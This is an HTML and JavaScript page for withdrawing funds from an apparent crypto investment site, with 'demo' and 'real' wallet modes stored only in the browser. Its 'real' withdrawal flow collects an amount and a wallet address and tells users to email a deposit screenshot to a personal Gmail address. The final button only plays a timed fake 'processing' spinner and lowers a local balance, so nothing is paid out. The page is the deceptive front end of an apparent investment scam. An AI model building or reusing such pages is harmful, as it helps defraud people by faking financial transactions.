<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Withdraw Funds</title>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet">
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        body { font-family: 'Inter', system-ui, -apple-system, Segoe UI, Roboto, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif; }
        .glass { background: linear-gradient(180deg, rgba(255, 255, 255, 0.04), rgba(255, 255, 255, 0.02)); backdrop-filter: blur(8px); }
        .step { display: none; }
        .step.active { display: block; }
        #loading-overlay {
            position: fixed;
            top: 0; left: 0; right: 0; bottom: 0;
            background-color: rgba(0, 0, 0, 0.8);
            display: none;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            color: white;
            z-index: 1000;
        }
        .spinner {
            border: 4px solid rgba(255, 255, 255, 0.3);
            border-top: 4px solid #3498db;
            border-radius: 50%;
            width: 50px;
            height: 50px;
            animation: spin 1s linear infinite;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
</head>
<body class="min-h-screen bg-zinc-950 text-zinc-50 flex flex-col items-center justify-center p-4">
    <div id="toast" class="fixed top-4 right-4 hidden px-4 py-3 rounded-xl border border-zinc-700 bg-zinc-900/90 shadow-lg z-50"></div>
    <div id="loading-overlay">
        <div class="spinner"></div>
        <p class="mt-4 text-center">Processing your withdrawal...</p>
    </div>

    <main class="w-full max-w-md space-y-6">
        <a href="investment.html" class="flex items-center text-zinc-400 hover:text-zinc-50 transition-colors mb-6">
            <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="2.5" stroke="currentColor" class="w-5 h-5 mr-1">
                <path stroke-linecap="round" stroke-linejoin="round" d="M10.5 19.5L3 12m0 0l7.5-7.5M3 12h18" />
            </svg>
            Back to Dashboard
        </a>

        <!-- Main Withdraw Container -->
        <div class="p-6 rounded-2xl border border-zinc-700 glass space-y-6">
            <h1 class="text-2xl font-semibold">Withdraw Funds</h1>
            <p id="withdraw-intro-text" class="text-sm text-zinc-400"></p>

            <!-- Demo Mode Withdrawal Form -->
            <div id="demo-withdraw-form" class="hidden space-y-4">
                <div class="space-y-2">
                    <label for="demo-withdraw-amount" class="text-sm text-zinc-400">Enter Amount (USD)</label>
                    <input type="number" id="demo-withdraw-amount" min="1" placeholder="e.g., 50" class="w-full px-4 py-3 rounded-xl bg-zinc-800 border border-zinc-700 focus:outline-none focus:ring-2 focus:ring-red-500 text-zinc-50">
                </div>
                <button id="demo-withdraw-btn" class="w-full px-4 py-3 rounded-xl bg-red-500 hover:bg-red-600 font-semibold text-zinc-950 transition-colors">Withdraw from Demo Wallet</button>
            </div>

            <!-- Real Mode Multi-Step Form -->
            <div id="real-withdraw-form" class="hidden">
                <!-- Step 1: Amount Input -->
                <div id="step-1" class="step active space-y-6">
                    <p class="text-sm text-zinc-400">Minimum withdrawal amount is $20.</p>
                    <div class="space-y-2">
                        <label for="real-withdraw-amount" class="text-sm text-zinc-400">Enter Amount (USD)</label>
                        <input type="number" id="real-withdraw-amount" min="20" placeholder="e.g., 100" class="w-full px-4 py-3 rounded-xl bg-zinc-800 border border-zinc-700 focus:outline-none focus:ring-2 focus:ring-green-500 text-zinc-50">
                    </div>
                    <button id="next-btn" class="w-full px-4 py-3 rounded-xl bg-green-500 hover:bg-green-600 font-semibold text-zinc-950 transition-colors">Next</button>
                </div>

                <!-- Step 2: Crypto Address -->
                <div id="step-2" class="step space-y-6">
                    <h2 class="text-xl font-semibold">Enter Crypto Address</h2>
                    <p class="text-sm text-zinc-400">Please enter your crypto wallet address to receive the funds.</p>
                    <div class="space-y-2">
                        <label for="crypto-address" class="text-sm text-zinc-400">Wallet Address</label>
                        <input type="text" id="crypto-address" placeholder="e.g., bc1qv..." class="w-full px-4 py-3 rounded-xl bg-zinc-800 border border-zinc-700 focus:outline-none focus:ring-2 focus:ring-green-500 text-zinc-50">
                    </div>
                    <button id="email-me-btn" class="w-full px-4 py-3 rounded-xl bg-blue-500 hover:bg-blue-600 font-semibold text-zinc-950 transition-colors">Email Me</button>
                </div>

                <!-- Step 3: Instructions and Final Withdraw Button -->
                <div id="step-3" class="step space-y-6">
                    <h2 class="text-xl font-semibold">Important Instructions</h2>
                    <p class="text-sm text-zinc-400">To finalize your withdrawal, please follow these steps:</p>
                    <ul class="list-disc list-inside text-sm text-zinc-400 space-y-2">
                        <li>Email your deposit screenshot to: <span class="text-green-400 font-bold">elses685@gmail.com</span></li>
                        <li>Email your crypto address to the same email.</li>
                    </ul>
                    <button id="final-withdraw-btn" class="w-full px-4 py-3 rounded-xl bg-red-500 hover:bg-red-600 font-semibold text-zinc-950 transition-colors hidden">Complete Withdrawal</button>
                </div>
            </div>
        </div>
    </main>

    <script type="module">
        const $ = (id) => document.getElementById(id);
        const STORAGE_KEYS = {
            wallet: 'mdesk_wallet_v1',
            demoWallet: 'mdesk_demowallet_v1',
            walletMode: 'mdesk_wallet_mode',
        };

        const walletMode = localStorage.getItem(STORAGE_KEYS.walletMode) || 'real';
        const currentWalletKey = walletMode === 'real' ? STORAGE_KEYS.wallet : STORAGE_KEYS.demoWallet;

        function getWalletBalance() {
            const wallet = JSON.parse(localStorage.getItem(currentWalletKey)) || { balance: 0 };
            return wallet.balance;
        }

        function updateWalletBalance(amount) {
            let wallet = JSON.parse(localStorage.getItem(currentWalletKey)) || { balance: 0 };
            wallet.balance += amount;
            localStorage.setItem(currentWalletKey, JSON.stringify(wallet));
        }

        function toast(msg) {
            const el = $('toast');
            el.textContent = msg;
            el.classList.remove('hidden');
            setTimeout(() => el.classList.add('hidden'), 3500);
        }
        
        // --- Demo Mode Logic ---
        if (walletMode === 'demo') {
            $('demo-withdraw-form').style.display = 'block';
            $('real-withdraw-form').style.display = 'none';
            $('withdraw-intro-text').textContent = "You are in Demo mode. Your withdrawals will be processed instantly from your demo account.";

            $('demo-withdraw-btn').addEventListener('click', () => {
                const amount = parseFloat($('demo-withdraw-amount').value);
                const currentBalance = getWalletBalance();
                if (isNaN(amount) || amount <= 0) {
                    toast('Please enter a valid amount.');
                    return;
                }
                if (amount > currentBalance) {
                    toast('Insufficient balance in your demo account.');
                    return;
                }
                updateWalletBalance(-amount);
                toast(`Successfully withdrew $${amount.toFixed(2)} from your demo account.`);
                setTimeout(() => {
                    window.location.href = 'investment.html';
                }, 1500);
            });
        } 
        
        // --- Real Mode Logic (New) ---
        else {
            let withdrawAmount = 0;
            const steps = ['step-1', 'step-2', 'step-3'].map(id => $(id));
            
            const showStep = (stepIndex) => {
                steps.forEach((step, index) => {
                    step.classList.toggle('active', index === stepIndex);
                    step.style.display = index === stepIndex ? 'block' : 'none';
                });
            };

            $('demo-withdraw-form').style.display = 'none';
            $('real-withdraw-form').style.display = 'block';
            $('withdraw-intro-text').textContent = "Process a real-money withdrawal.";

            // Step 1: Amount Input and Next button
            $('next-btn').addEventListener('click', () => {
                const amountInput = $('real-withdraw-amount');
                withdrawAmount = parseFloat(amountInput.value);
                const currentBalance = getWalletBalance();

                if (isNaN(withdrawAmount) || withdrawAmount < 20) {
                    toast('Please enter a valid amount of $20 or more.');
                    return;
                }
                if (withdrawAmount > currentBalance) {
                    toast('Insufficient balance.');
                    return;
                }
                showStep(1); // Move to Step 2
            });

            // Step 2: Email Me button
            $('email-me-btn').addEventListener('click', () => {
                const cryptoAddress = $('crypto-address').value.trim();
                if (cryptoAddress === "") {
                    toast('Please enter your crypto address.');
                    return;
                }
                showStep(2); // Move to Step 3
                $('final-withdraw-btn').style.display = 'block'; // Show the final button
            });

            // Final Withdraw button
            $('final-withdraw-btn').addEventListener('click', () => {
                const loadingOverlay = $('loading-overlay');
                loadingOverlay.style.display = 'flex';

                // Simulate processing time
                setTimeout(() => {
                    loadingOverlay.style.display = 'none';
                    updateWalletBalance(-withdrawAmount);
                    toast(`Withdrawal of $${withdrawAmount.toFixed(2)} is being processed.`);
                    setTimeout(() => {
                        window.location.href = 'investment.html';
                    }, 2000); // Redirect after a short delay
                }, 4000); // 4-second simulation
            });

            showStep(0); // Initial view for real mode
        }
    </script>
</body>
</html>
